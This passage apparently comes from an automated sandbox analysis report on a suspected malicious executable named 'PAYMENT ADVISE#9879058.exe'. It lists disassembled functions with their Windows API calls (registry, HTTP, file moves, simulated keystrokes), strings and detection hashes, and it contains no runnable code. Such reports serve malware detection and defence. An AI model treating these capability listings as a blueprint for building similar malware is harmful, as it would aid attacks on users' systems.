                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 0-1603158881
                          • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                          • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                          • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                          • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                          Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00479D1F
                          • VariantInit.OLEAUT32(?), ref: 00479F06
                          • VariantClear.OLEAUT32(?), ref: 00479F11
                          • VariantInit.OLEAUT32(?), ref: 00479DF7
                            • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                            • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                            • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                          • VariantClear.OLEAUT32(?), ref: 00479F9C
                            • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                          • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 665237470-60002521
                          • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                          • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                          • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                          • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                          Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ConnectRegistry_wcslen
                          • String ID: HH
                          • API String ID: 535477410-2761332787
                          • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                          • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                          • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                          • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                          Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0045F317
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                          • IsMenu.USER32(?), ref: 0045F380
                          • CreatePopupMenu.USER32 ref: 0045F3C5
                          • GetMenuItemCount.USER32(?), ref: 0045F42F
                          • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                          • String ID: 0$2
                          • API String ID: 3311875123-3793063076
                          • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                          • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                          • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                          • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                          Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe), ref: 0043719E
                          • LoadStringW.USER32(00000000), ref: 004371A7
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                          • LoadStringW.USER32(00000000), ref: 004371C0
                          • _printf.LIBCMT ref: 004371EC
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                          Strings
                          • C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe, xrefs: 00437189
                          • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_printf
                          • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe
                          • API String ID: 220974073-3917868312
                          • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                          • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                          • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                          • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                          Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                          • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                          • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                          • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                          Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,?,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,004A8E80,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,0040F3D2), ref: 0040FFCA
                            • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                          • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                          • MoveFileW.KERNEL32(?,?), ref: 0045358E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                          • String ID:
                          • API String ID: 978794511-0
                          • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                          • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                          • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                          • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                          Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                          • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                          • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                          • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                          Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                            • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                            • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                          • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                          • Sleep.KERNEL32(00000000), ref: 00445D70
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                          • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                          • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                          • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                          Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressProc_malloc$_strcat_strlen
                          • String ID: AU3_FreeVar
                          • API String ID: 2184576858-771828931
                          • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                          • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                          • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                          • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                          Function 00401D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235COMMON
                          Download Yara Rule
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                          • DestroyWindow.USER32(?), ref: 0042A751
                          • UnregisterHotKey.USER32(?), ref: 0042A778
                          • FreeLibrary.KERNEL32(?), ref: 0042A822
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 4174999648-3243417748
                          • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                          • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                          • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                          • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                          Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                          • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                          • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                            • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                          • String ID:
                          • API String ID: 1291720006-3916222277
                          • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                          • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                          • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                          • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                          Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorLastselect
                          • String ID: HH
                          • API String ID: 215497628-2761332787
                          • Opcode ID: d4dee826ad07c8790196afe3a66b02134916bcd065c8c5f95b8a7bfd3fd6b23c
                          • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                          • Opcode Fuzzy Hash: d4dee826ad07c8790196afe3a66b02134916bcd065c8c5f95b8a7bfd3fd6b23c
                          • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                          Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __snwprintf__wcsicoll_wcscpy
                          • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                          • API String ID: 1729044348-3708979750
                          • Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                          • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                          • Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                          • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                          Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,?,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,004A8E80,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,0040F3D2), ref: 0040FFCA
                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                          • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                          • _wcscat.LIBCMT ref: 0044BCAA
                          • _wcslen.LIBCMT ref: 0044BCB7
                          • _wcslen.LIBCMT ref: 0044BCCB
                          • SHFileOperationW.SHELL32 ref: 0044BD16
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                          • String ID: \*.*
                          • API String ID: 2326526234-1173974218
                          • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                          • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                          • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                          • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                          Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                          • _wcslen.LIBCMT ref: 004366DD
                          • GetFileAttributesW.KERNEL32(?), ref: 00436700
                          • GetLastError.KERNEL32 ref: 0043670F
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                          • _wcsrchr.LIBCMT ref: 0043674C
                            • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                          • String ID: \
                          • API String ID: 321622961-2967466578
                          • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                          • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                          • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                          • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
